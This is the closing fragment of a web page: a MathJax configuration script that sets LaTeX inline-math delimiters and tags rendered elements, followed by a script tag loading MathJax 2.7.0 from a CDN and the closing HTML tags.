MathJax.Hub.Config({
    tex2jax: {
        inlineMath: [ ['$','$'], ["\\(","\\)"]  ],
        processEscapes: true,
        skipTags: ['script', 'noscript', 'style', 'textarea', 'pre', 'code']
    }
});

MathJax.Hub.Queue(function() {
    var all = MathJax.Hub.getAllJax(), i;
    for(i=0; i < all.length; i += 1) {
        all[i].SourceElement().parentNode.className += ' has-jax';                 
    }       
});
</script>

<script src="//cdn.bootcss.com/mathjax/2.7.0/MathJax.js"></script>


  </div>
</body>
</html>